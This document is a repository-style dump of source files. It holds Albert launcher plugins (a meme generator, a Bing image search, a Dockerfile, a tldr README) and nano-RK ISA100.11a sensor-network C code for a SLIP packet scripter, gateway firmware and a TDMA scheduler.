from pathlib import Path
from typing import List
import shutil
import subprocess
import traceback
from fuzzywuzzy import process
from gi.repository import GdkPixbuf, Notify
import albert as v0
md_name = "Meme"
md_description = (
"Meme Generator - Generate memes with custom quotes - ready to be copied / uploaded /"
" shared at an instant"
)
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/meme-generator"
)
md_bin_dependencies = ["meme", "xclip"]
md_lib_dependencies = ["shutil", "fuzzywuzzy"]
icon_path = str(Path(__file__).parent / "meme-generator")
cache_path = Path(v0.cacheLocation()) / "meme-generator"
config_path = Path(v0.configLocation()) / "meme-generator"
data_path = Path(v0.dataLocation()) / "meme-generator"
# plugin main functions -----------------------------------------------------------------------
def initialize():
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize():
pass
def import_template_ids() -> List[str]:
"""Return a list of all the supported template IDs."""
if not shutil.which("meme"):
raise RuntimeError(
'Cannot find the "meme" go package - "'
"Are you sure you installed https://github.com/nomad-software/meme?"
)
return subprocess.check_output(["meme", "-list-templates"]).decode("utf-8").splitlines()
def get_template_img(meme_id: str) -> Path:
"""Get the path to the template image, given the template meme ID."""
# may be a bit fragile - TODO Find a better way to do it.
bin_path = Path(shutil.which("meme")).parent # type: ignore
meme_reg_path = bin_path.parent / "pkg" / "mod" / "github.com" / "nomad-software"
meme_reg_versions = list(meme_reg_path.glob("meme@*"))
if not meme_reg_versions:
raise RuntimeError(f'Can\'t find any Go "meme" packages under {meme_reg_path}')
    # use the most recent version (glob order is unspecified, so sort explicitly)
    return sorted(meme_reg_versions)[-1] / "data" / "images" / f"{meme_id}.jpg"
class Template:
def __init__(self, id: str):
self.id = id
self.img = get_template_img(id)
def title(self) -> str:
return self.id.replace("-", " ").capitalize()
@property
def albert_id(self):
return f"{md_name}_{self.id}"
def get_as_item(self, query):
"""Return it as item - ready to be appended to the items list and be rendered by
Albert.
"""
return v0.Item(
id=self.albert_id,
icon=[str(self.img)],
text=self.title(),
subtext="",
completion=f"{query.trigger} {self.id} ",
actions=[
FuncAction("Copy vanilla image", lambda: self.copy_vanilla_img()),
ClipAction("Copy vanilla image path", str(self.img)),
],
)
def _create_custom_meme(self, caption1: str, caption2: str) -> Path:
output = "/tmp/albert-meme.png"
subprocess.check_call(
["meme", "-i", self.id, "-o", output, "-t", f"{caption1}|{caption2}"]
)
return Path(output)
def _create_n_copy_to_clipboard(self, caption1: str, caption2: str):
p = self._create_custom_meme(caption1=caption1, caption2=caption2)
subprocess.check_call(["xclip", "-selection", "clipboard", "-t", "image/png", str(p)])
def _create_n_copy_path_to_clipboard(self, caption1: str, caption2: str):
p = self._create_custom_meme(caption1=caption1, caption2=caption2)
subprocess.Popen(f"echo {p}| xclip -selection clipboard", shell=True)
def get_as_item_custom(self, query, caption1=None, caption2=None):
if caption1 or caption2:
subtext = f"UP: {caption1} | DOWN: {caption2}"
else:
subtext = f"USAGE: {self.id} [upper-text] | [lower-text]"
return v0.Item(
id=md_name,
icon=[str(self.img)],
text=self.title(),
subtext=subtext,
completion=f"{query.trigger} {self.id} ",
actions=[
FuncAction(
"Copy generated custom meme to clipboard",
lambda caption1=caption1, caption2=caption2: self._create_n_copy_to_clipboard(
caption1=caption1, caption2=caption2
),
),
FuncAction(
"Copy generated custom meme path",
lambda caption1=caption1, caption2=caption2: str(
self._create_n_copy_path_to_clipboard(
caption1=caption1, caption2=caption2
)
),
),
],
)
def copy_vanilla_img(self):
fname_out = "/tmp/meme.png"
subprocess.check_call(["convert", "-format", "png", str(self.img), fname_out])
subprocess.check_call(
["xclip", "-selection", "clipboard", "-t", "image/png", fname_out]
)
all_templates = [Template(id=id) for id in import_template_ids()]
id_to_template = {template.id: template for template in all_templates}
# supplementary functions ---------------------------------------------------------------------
def notify(
msg: str,
app_name: str = md_name,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def sanitize_string(s: str) -> str:
    return s.replace("<", "&lt;")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "meme "
def synopsis(self):
return "some meme"
def initialize(self):
pass
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
query_str = query.string
query_parts = query_str.split()
if not query_parts:
query.add([template.get_as_item(query) for template in all_templates])
return
meme_id = query_parts[0]
if meme_id in id_to_template:
captions = [c.strip() for c in " ".join(query_parts[1:]).split("|")]
c1 = captions[0]
c2 = captions[1] if len(captions) > 1 else ""
results.insert(
0,
id_to_template[meme_id].get_as_item_custom(
query, caption1=c1, caption2=c2
),
)
else:
title_to_templ = {template.title(): template for template in all_templates}
# do fuzzy search - show relevant issues
matched = process.extract(
query.string.strip(), list(title_to_templ.keys()), limit=5
)
for m in [elem[0] for elem in matched]:
results.append(title_to_templ[m].get_as_item(query))
except Exception: # user to report error
v0.critical(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep>FROM bergercookie/albertlauncher:ubuntu18.04
# Arguments --------------------------------------------------------------------
ARG USERNAME=someuser
ARG UID=1000
ARG GID=1000
ARG HOME="/home/someuser"
ARG SRC
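# Illustrative build invocation (all values below are examples):
#   docker build --build-arg USERNAME=dev --build-arg UID=$(id -u) \
#       --build-arg GID=$(id -g) --build-arg HOME=/home/dev --build-arg SRC=/src .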
# Environment ------------------------------------------------------------------
ENV UID_=$UID
ENV GID_=$GID
# local configuration ----------------------------------------------------------
# install packages -------------------------------------------------------------
# hadolint ignore=DL3008
RUN apt-get update \
&& apt-get install --no-install-recommends -y vim sudo \
python3 python3-pip python3-setuptools \
libsasl2-dev python-dev libldap2-dev libssl-dev \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/*
RUN pip3 install --upgrade wheel pyopenssl
# "secrets" ships with the Python >= 3.6 standard library, so it needn't be pip-installed
RUN pip3 install --upgrade requests ddgr cookiecutter
# don't be root ----------------------------------------------------------------
RUN echo "$USERNAME:x:$UID_:$GID_:$USERNAME,,,:$HOME:/bin/bash" >> /etc/passwd
RUN echo "$USERNAME:x:$UID_:" >> /etc/group
RUN echo "$USERNAME ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers.d/$USERNAME
RUN chmod 0440 /etc/sudoers.d/$USERNAME
RUN chown "$UID_:$GID_" -R $HOME
RUN mkdir -p $SRC
RUN chown "$UID_:$GID_" -R $SRC
USER $USERNAME
ENV HOME $HOME
WORKDIR $SRC
<file_sep>"""Search and potentially download images using Bing."""
import imghdr
import json
import subprocess
from functools import cached_property
from pathlib import Path
from typing import Iterator, Optional
import albert as v0
import requests
from bs4 import BeautifulSoup
"""Search and potentially download images using Bing."""
user_agent = (
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"
)
class BingImage:
def __init__(self, url: str, download_dir=Path()):
self._url: str = url
self._download_dir = download_dir
self._type = ""
@property
def type(self) -> str:
if self._type is "":
self._type = imghdr.what(str(self.image))
if self._type is None:
self._type = ""
return self._type
@property
def download_dir(self):
return self._download_dir
@download_dir.setter
def download_dir(self, d):
self._download_dir = d
@cached_property
def image(self):
"""Get the path to the downloaded image - Reuses the image if it's already in the cache."""
assert self._url is not None
filepath = self.download_dir / self._url.split("/")[-1]
if not filepath.is_file():
download_image(url=self._url, filepath=filepath)
return filepath
@property
def thumbnail(self):
return self.image
# assert self._url is not None
# if not self._cached_thumb:
# img = self.image
# return self._cached_thumb
@property
def url(self):
return self._url
def __hash__(self):
return hash(self.url)
def download_image(url, filepath: Path = Path()):
v0.debug(f"Downloading image {url} -> {filepath}...")
subprocess.check_output(["wget", "-O", str(filepath), url], stderr=subprocess.STDOUT)
v0.debug(f"Downloaded image {url} -> {filepath}")
def bing_search(query: str, limit: int, adult_filter=False) -> Iterator[BingImage]:
bool_corrs = {
True: "on",
False: "off",
}
page_counter = 0
results_counter = 0
while results_counter < limit:
# Parse the page source and download pics
headers = {"User-Agent": user_agent}
payload = (
("q", str(query)),
("first", page_counter),
("adlt", bool_corrs[adult_filter]),
)
source = requests.get(
"https://www.bing.com/images/async", params=payload, headers=headers
).content
soup = BeautifulSoup(str(source).replace("\r\n", ""), "lxml")
for a in soup.find_all("a", class_="iusc"):
if results_counter >= limit:
break
try:
if (m := a.get("m")) is not None:
iusc = json.loads(m.replace("\\", ""))
else:
continue
url = iusc["murl"]
yield BingImage(url=url)
results_counter += 1
except (json.decoder.JSONDecodeError, RuntimeError):
continue
page_counter += 1
if __name__ == "__main__":
import sys
assert len(sys.argv) >= 2, "I need a query string"
query = sys.argv[1]
limit = int(sys.argv[2]) if len(sys.argv) > 2 else 10
imgs = bing_search(query, limit)
print("Downloaded images: ")
for img in imgs:
print(f"\t{img.image}")
<file_sep># tldr_pages - Albert plugin
## Description
View [TL;DR](https://github.com/tldr-pages/tldr) pages in Albert. Pages are by
default cached under `~/.cache/albert/tldr_pages/tldr`. By default it uses the
English version of the tldr pages. If that's not what you want, alter the
following line in `__init__.py` appropriately and restart Albert.
```python
pages_root = tldr_root / "pages"
```
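
For instance, to use the French translations (assuming your local tldr clone
ships the `pages.fr` directory, as upstream does), the line would become:

```python
pages_root = tldr_root / "pages.fr"
```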
## Demo

## Manual installation instructions
Requirements:
- Albert - [Installation instructions](https://albertlauncher.github.io/docs/installing/)
- Albert Python Interface: ``v0.4``
- Python version >= 3.5
- git for downloading and managing the tldr pages
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<repo_name>echiacchiarini/OpenISA<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/SAMPL/slip-clients/pkt-scripter/.svn/text-base/main.c.svn-base
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include "../../include/sampl.h"
#include <slipstream.h>
//#include "tree_route.h"
//#include "slipstream.h"
#define gw_mac 0
uint8_t debug_txt_flag;
uint8_t xmpp_flag;
uint8_t no_slip_flag;
uint8_t print_input_flag;
#define NONBLOCKING 0
#define BLOCKING 1
#define HEX_STR_SIZE 5
void handle_incomming_pkt(uint8_t *rx_buf,uint8_t len);
void error(char *msg);
void print_ds_packet(SAMPL_DOWNSTREAM_PKT_T *ds_pkt );
int sockfd, portno, n;
struct sockaddr_in serv_addr;
struct hostent *server;
int size;
char buffer[2048];
SAMPL_DOWNSTREAM_PKT_T ds_pkt;
int main (int argc, char *argv[])
{
FILE *fp;
uint8_t tx_buf[128];
uint8_t rx_buf[128];
int32_t v,cnt,i,len;
uint8_t nav_time_secs;
int32_t tmp;
time_t t;
uint8_t cmd,error;
char buf[1024];
debug_txt_flag=0;
xmpp_flag=0;
no_slip_flag=0;
print_input_flag=0;
if (argc < 3 || argc > 4) {
printf ("Usage: server port [-dx]\n");
printf (" d Debug Input Text\n");
printf (" x Use XMPP server\n");
printf (" n Don't send SLIP packets (but receive them)\n");
exit (1);
}
if(argc==4)
{
// Grab dash command line options
if(strstr(argv[3],"d")!=NULL )
{
debug_txt_flag=1;
}
if(strstr(argv[3],"x")!=NULL )
{
xmpp_flag=1;
}
if(strstr(argv[3],"n")!=NULL )
{
no_slip_flag=1;
}
}
fp=fopen( "ff_config.txt","r" );
if(fp==NULL) {
printf( "Could not open ff_config.txt!\n" );
printf( "This is required for sending control commands\n" );
exit(0);
}
v=slipstream_open(argv[1],atoi(argv[2]),NONBLOCKING);
nav_time_secs=25;
cnt = 0;
while (1) {
error=0;
cmd=0;
// Check if TX queue has
// Read Data packet from script file
while(cmd==0)
{
v=fscanf( fp, "%[^\n]\n", buf);
if(v==-1) rewind(fp);
if(buf[0]!='#' && v!=-1)
{
uint8_t offset;
offset=0;
i=0;
tmp=1;
while(tmp==1) {
        tmp=sscanf( &buf[offset*HEX_STR_SIZE],"0x%hhx ",&tx_buf[i] ); /* %hhx writes a single byte */
// printf( "i=%d tmp=%d val=0x%x\n",i,tmp,tx_buf[i] );
if(tmp==1) { offset++; i++; }
}
// Setup the packet to send out to the network which was read from the file
len=offset;
ds_pkt.buf_len=offset;
ds_pkt.buf=tx_buf;
unpack_downstream_packet( &ds_pkt, 0 );
// write to the structure and raw buffer
// We end up transmitting the raw buffer after adding thecorrect sequence number
tx_buf[SEQ_NUM]=cnt;
ds_pkt.seq_num=cnt;
if(debug_txt_flag==1)
print_ds_packet(&ds_pkt );
if(i<20 )
{
error=1;
printf( "Error parsing input file!\n" );
}
cnt++;
nav_time_secs=tx_buf[DS_NAV];
cmd=1;
}
}
// Send the packet
if(len>128) len=128;
if(!no_slip_flag && error==0)
v=slipstream_send(tx_buf,len);
if(debug_txt_flag==1)
{
if (v == 0) printf( "Error sending\n" );
else printf( "Sent request %d\n",tx_buf[SEQ_NUM]);
}
if(debug_txt_flag==1)
printf( "Waiting %d seconds\n",nav_time_secs );
t=time(NULL);
t+=nav_time_secs;
// Collect Reply packets for NAV seconds
while(t>time(NULL))
{
v=slipstream_receive( rx_buf);
if (v > 0) {
handle_incomming_pkt(rx_buf,v);
}
usleep(1000);
}
}
}
void print_ds_packet(SAMPL_DOWNSTREAM_PKT_T *ds_pkt )
{
int i;
printf( "Downstream Packet Header info:\n" );
printf( " pkt type\t\t0x%x\n",ds_pkt->pkt_type);
printf( " ctrl flags\t\t0x%x\n",ds_pkt->ctrl_flags );
printf( " seq num\t\t0x%x\n",ds_pkt->seq_num );
printf( " priority\t\t0x%x\n",ds_pkt->priority);
printf( " ack retry\t\t0x%x\n",ds_pkt->ack_retry);
printf( " subnet mac\t\t0x%x\n",ds_pkt->subnet_mac);
printf( " hop_cnt\t\t0x%x\n",ds_pkt->hop_cnt);
printf( " hop_max\t\t0x%x\n",ds_pkt->hop_max);
printf( " delay_per_level\t0x%x\n",ds_pkt->delay_per_level);
printf( " nav\t\t\t0x%x\n",ds_pkt->nav);
printf( " mac_check_rate\t0x%x\n",ds_pkt->mac_check_rate);
printf( " rssi_threshold\t0x%x\n",ds_pkt->rssi_threshold);
printf( " last_hop_mac\t\t0x%x\n",ds_pkt->last_hop_mac);
printf( " mac_filter_num\t0x%x\n",ds_pkt->mac_filter_num);
printf( " aes_ctr\t\t0x%x 0x%x 0x%x 0x%x\n",ds_pkt->aes_ctr[3], ds_pkt->aes_ctr[3],
ds_pkt->aes_ctr[2], ds_pkt->aes_ctr[1], ds_pkt->aes_ctr[0]);
printf( "Extra Data: " );
for(i=DS_PAYLOAD_START; i<ds_pkt->buf_len; i++ )
printf( "0x%x ",ds_pkt->buf[i] );
printf( "\n\n" );
}
void print_gw_packet(SAMPL_GATEWAY_PKT_T *gw_pkt )
{
int i;
printf( "Gateway Packet Header info:\n" );
printf( " pkt type\t\t0x%x\n",gw_pkt->pkt_type);
printf( " ctrl flags\t\t0x%x\n",gw_pkt->ctrl_flags );
printf( " seq num\t\t0x%x\n",gw_pkt->seq_num );
printf( " priority\t\t0x%x\n",gw_pkt->priority);
printf( " ack retry\t\t0x%x\n",gw_pkt->ack_retry);
printf( " subnet mac\t\t0x%x\n",gw_pkt->subnet_mac);
printf( " rssi\t\t0x%x\n",gw_pkt->rssi);
printf( " last_hop_mac\t\t0x%x\n",gw_pkt->last_hop_mac);
printf( "Extra Data: " );
for(i=DS_PAYLOAD_START; i<gw_pkt->buf_len; i++ )
printf( "0x%x ",gw_pkt->buf[i] );
printf( "\n\n" );
}
void handle_incomming_pkt(uint8_t *rx_buf,uint8_t len)
{
int i;
SAMPL_GATEWAY_PKT_T gw_pkt;
printf( "Raw Pkt [%d] = ",len );
for(i=0; i<len; i++ ) printf( "%d ",rx_buf[i] );
printf( "\n" );
gw_pkt.buf=rx_buf;
gw_pkt.buf_len=len;
unpack_gateway_packet(&gw_pkt );
print_gw_packet(&gw_pkt);
}
void error(char *msg)
{
perror(msg);
exit(0);
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/final_project/gateway/makefile
# Platform name cc2420DK, firefly, micaZ, firefly2, firefly2_2
PLATFORM = firefly2_2
# Target file name (without extension).
TARGET = main
# Set the Port that you programmer is connected to
PROGRAMMING_PORT = /dev/ttyUSB1 # programmer connected to serial device
# Set this such that the nano-RK directory is the base path
ROOT_DIR = ../../..
# Set platform specific defines
# The following will be defined based on the PLATFORM variable:
# PROG_TYPE (e.g. avrdude, or uisp)
# MCU (e.g. atmega32, atmega128, atmega1281)
# RADIO (e.g. cc2420)
include $(ROOT_DIR)/include/platform.mk
SRC = $(TARGET).c
# Add extra source files.
# For example:
# SRC += $(ROOT_DIR)/src/platform/$(PLATFORM_TYPE)/source/my_src1.c
#SRC += $(ROOT_DIR)/src/net/rt_link/rt_link.c
#SRC += $(ROOT_DIR)/src/net/rt_link/rtl_scheduler.c
#SRC += $(ROOT_DIR)/src/net/rt_link/rtl_debug.c
SRC += $(ROOT_DIR)/src/net/slip/slip.c
SRC += $(ROOT_DIR)/src/net/isa/isa_error.c
SRC += $(ROOT_DIR)/src/net/isa/dlmo.c
SRC += $(ROOT_DIR)/src/net/isa/isa.c
#SRC += $(ROOT_DIR)/src/net/isa/isa_scheduler.c
SRC += $(ROOT_DIR)/src/drivers/platform/$(PLATFORM_TYPE)/source/ff_basic_sensor.c
SRC += $(ROOT_DIR)/src/net/isa/uart/command-interpreter.c
# Add extra includes files.
# For example:
# EXTRAINCDIRS += $(ROOT_DIR)/src/platform/include
EXTRAINCDIRS =
#EXTRAINCDIRS += $(ROOT_DIR)/src/net/rt_link/
EXTRAINCDIRS += $(ROOT_DIR)/src/net/isa/
EXTRAINCDIRS += $(ROOT_DIR)/src/net/isa/uart/
#EXTRAINCDIRS += $(ROOT_DIR)/src/net/rt_link/platform/$(PLATFORM_TYPE)/
EXTRAINCDIRS += $(ROOT_DIR)/src/net/isa/platform/$(PLATFORM_TYPE)/
EXTRAINCDIRS += $(ROOT_DIR)/src/net/slip
# This is where the final compile and download happens
include $(ROOT_DIR)/include/platform/$(PLATFORM)/common.mk<file_sep>/ISA100.11a-master/ISA100_11a/11-2/backup/pre_isa_with_initial_sync_bug/final_project/gateway/main.c
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <isa.h>
#include <nrk_error.h>
#include <slip.h>
//#include <sys/time.h>
#define MY_CHANNEL 19
#define MY_ID 0 //change
#define MY_TX_SLOT 0
#define NUM_OF_TEST_SET 16
#define MAX_SLIP_BUF 16
#define JOIN_TX_SLOT_START 22
//#define MY_RX_SLOT 15
//#define MY_RX_SLOT 2// change for test
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
NRK_STK Stack2[NRK_APP_STACKSIZE];
nrk_task_type TaskTwo;
void Task2 (void);
void nrk_create_taskset();
void packet_measurement(uint8_t * local_rx_buf, uint8_t len);
void packet_measurement_better(uint8_t * local_rx_buf,uint8_t len);
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t slip_tx_buf[MAX_SLIP_BUF];
uint8_t slip_rx_buf[MAX_SLIP_BUF];
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
uint8_t pkt_measure[NUM_OF_TEST_SET];
uint8_t sendFlag=0;
uint8_t frame_cnt=0; //add 1 every 8 packets
uint8_t pkt_cnt;
char current_pkt_index='0';
int main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
isa_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t j, i;
uint8_t length,slot,len;
uint8_t *local_rx_buf;
//uint32_t Score = 0;
int8_t rssi;
//uint8_t cnt=0;
//uint8_t pkt_cnt=0;
//char c = -1;
nrk_sig_t uart_rx_signal;
uint8_t finished = 0;
printf( "Task1 PID=%d\r\n",nrk_get_pid());
nrk_led_set(RED_LED);
nrk_led_set(BLUE_LED);
isa_set_channel_pattern(1);
//isa_set_channel_pattern(3);
isa_init (ISA_GATEWAY, MY_ID);//change
isa_set_schedule(ISA_GATEWAY, MY_ID);
isa_set_channel(MY_CHANNEL);
//configAdvDAUX(1, 0, 25, 1, NULL, NULL, NULL, 2, NULL, NULL, NULL);
isa_start();
isa_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
//slip_init (stdin, stdout, 0, 0);
//while (slip_started () != 1) nrk_wait_until_next_period ();
while(!isa_ready()) nrk_wait_until_next_period();
printf("isa start!\n\r");
//i=0;
while(1){
//nrk_gpio_toggle(NRK_DEBUG_0);
if( isa_rx_pkt_check()!=0 ) {
//printf("message is received.\n\r");
local_rx_buf=isa_rx_pkt_get(&length, &rssi);
//printf("RXLEN:%d\r\n",length);
//for(i=PKT_DATA_START; i<length-1; i++ )
printf( "%d",local_rx_buf[PKT_DATA_START+10]);
//packet_measurement(local_rx_buf,length);
//packet_measurement_better(local_rx_buf,length);
//pkt_cnt++;
isa_rx_pkt_release();
printf("\r\n");
}
sprintf( &tx_buf[PKT_DATA_START],"Hello");
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf,length,configDHDR(),MY_TX_SLOT);
//printf("Len:%d\r\n",length);
//printf("Hello world is sent.\n\r");
//printf("Recieved %d packets!\r\n",pkt_cnt);
isa_wait_until_rx_or_tx ();
}
}
void Task2 ()
{
uint16_t cnt;
uint8_t len,i;
printf ("My node's address is %d\r\n", NODE_ADDR);
printf ("Task1 PID=%d\r\n", nrk_get_pid ());
cnt = 0;
slip_init (stdin, stdout, 0, 0);
while (1) {
//nrk_led_set (ORANGE_LED);
//sprintf (slip_tx_buf, pkt_measure);
if(sendFlag){
for(uint8_t i=0;i<NUM_OF_TEST_SET;i++){
slip_tx_buf[i]=pkt_measure[i];
//printf("%x",slip_tx_buf[i]);
}
//sprintf (slip_tx_buf, pkt_measure);
//printf("\r\n");
            len = NUM_OF_TEST_SET; /* the bitmap is binary data - strlen() would stop at the first zero byte */
slip_tx (slip_tx_buf, len);
sendFlag=0;
for(i=0;i<NUM_OF_TEST_SET;i++){
pkt_measure[i]=0;
}
//nrk_wait_until_next_period ();
//cnt++;
}
nrk_wait_until_next_period ();
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 0;
TaskOne.period.nano_secs = 500*NANOS_PER_MS;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 500*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 0;
nrk_activate_task (&TaskOne);
TaskTwo.task = Task2;
nrk_task_set_stk( &TaskTwo, Stack2, NRK_APP_STACKSIZE);
TaskTwo.prio = 2;
TaskTwo.FirstActivation = TRUE;
TaskTwo.Type = BASIC_TASK;
TaskTwo.SchType = PREEMPTIVE;
TaskTwo.period.secs = 1;
TaskTwo.period.nano_secs = 500 * NANOS_PER_MS;
TaskTwo.cpu_reserve.secs = 0;
TaskTwo.cpu_reserve.nano_secs = 0;
TaskTwo.offset.secs = 0;
TaskTwo.offset.nano_secs = 0;
//nrk_activate_task (&TaskTwo);
nrk_kprintf( PSTR("Create Done\r\n") );
}
/*void packet_measurement(uint8_t * local_rx_buf,uint8_t len)
{
uint8_t i,length;
length=len;
if(local_rx_buf[PKT_DATA_START]=='r'){
//printf("first : %c\r\n", local_rx_buf[length-2]);
//printf("second : %c\r\n", local_rx_buf[length-3]);
//printf("third : %c\r\n", local_rx_buf[length-4]);
uint8_t temp_buf[3];
uint8_t temp;
uint8_t firstCheck;
temp_buf[0]=local_rx_buf[length-2];
if (local_rx_buf[length-3]>='0' && local_rx_buf[length-3]<='9'){
temp_buf[0]=local_rx_buf[length-3];
temp_buf[1]=local_rx_buf[length-2];
if (local_rx_buf[length-4]>='0' && local_rx_buf[length-4]<='9'){
temp_buf[0]=local_rx_buf[length-4];
temp_buf[1]=local_rx_buf[length-3];
temp_buf[2]=local_rx_buf[length-2];
}
}
else{
temp_buf[1]=0;
temp_buf[2]=0;
}
temp = atoi(temp_buf);
firstCheck = temp;
temp = temp%8;
//printf("final temp: %d\r\n",temp);
pkt_measure[frame_cnt] |= ((uint32_t) 1) << temp;
if(temp==0 && firstCheck>8){
frame_cnt++;
//printf("current frame cnt: %d\r\n", frame_cnt);
}
if(frame_cnt>=NUM_OF_TEST_SET){
for(i=0;i<NUM_OF_TEST_SET;i++){
printf("pkt measurement: %x\r\n",pkt_measure[i]);
}
// reboot buffer for further test
sendFlag=1;
for(i=0;i<NUM_OF_TEST_SET;i++){
pkt_measure[i]=0;
}
frame_cnt=0;
}
}
}*/
void packet_measurement_better(uint8_t * local_rx_buf,uint8_t len)
{
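    /* Track received packets as a bitmap: pkt_measure[] holds one bit per
     * packet (8 packets per byte). The sequence index is recovered from the
     * last payload character; once NUM_OF_TEST_SET frames are filled,
     * sendFlag tells Task2 to ship the bitmap over SLIP. */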
uint8_t i,length;
uint8_t next_pkt_offset;
uint8_t temp;
length=len;
if(local_rx_buf[PKT_DATA_START]=='r'){
next_pkt_offset = local_rx_buf[length-2]-current_pkt_index;
//printf("Next PKT OFFSET: %d", next_pkt_offset);
current_pkt_index = local_rx_buf[length-2];
pkt_cnt += next_pkt_offset;
temp = pkt_cnt%8;
pkt_measure[frame_cnt] |= ((uint8_t) 1) << temp;
if(temp==0 && pkt_cnt>8){
frame_cnt++;
//printf("current frame cnt: %d\r\n", frame_cnt);
}
if(frame_cnt>=NUM_OF_TEST_SET){
//for(i=0;i<NUM_OF_TEST_SET;i++){
//printf("pkt measurement: %x\r\n",pkt_measure[i]);
//}
printf("Sending info..\r\n");
// reboot buffer for further test
sendFlag=1;
frame_cnt=0;
}
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/src/net/isa/isa_scheduler.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
*******************************************************************************/
#include <isa.h>
#include <isa_scheduler.h>
#include <include.h>
#include <nrk_error.h>
/* For ISA */
/* This method is only for demo 1. Need to be updated!! */
int8_t isa_set_schedule (isa_node_mode_t isa_node_mode, uint8_t clk_src_id)
{
char i =0;
isa_clk_src_id = clk_src_id;//change
if (isa_node_mode==ISA_GATEWAY){
isa_tdma_tx_mask |= ((uint32_t) 1) << 2;
isa_tdma_rx_mask |= ((uint32_t) 1) << 3;//change for test
//isa_tdma_tx_mask |= ((uint32_t) 1) << 1;
//isa_tdma_rx_mask |= ((uint32_t) 1) << 4;
//isa_sched[1] = 1;
isa_sched[2] = 1;//change for test
isa_sched[3] = 1;
//isa_sched[4] = 1;
}
else if (isa_node_mode==ISA_REPEATER){ //change
isa_tdma_rx_mask |= ((uint32_t) 1) << 5;
isa_tdma_tx_mask |= ((uint32_t) 1) << 7;//change for test
isa_tdma_tx_mask |= ((uint32_t) 1) << 8;
isa_tdma_rx_mask |= ((uint32_t) 1) << 9;
isa_sched[7] = 1;
isa_sched[8] = 1;//change for test
isa_sched[5] = 1;
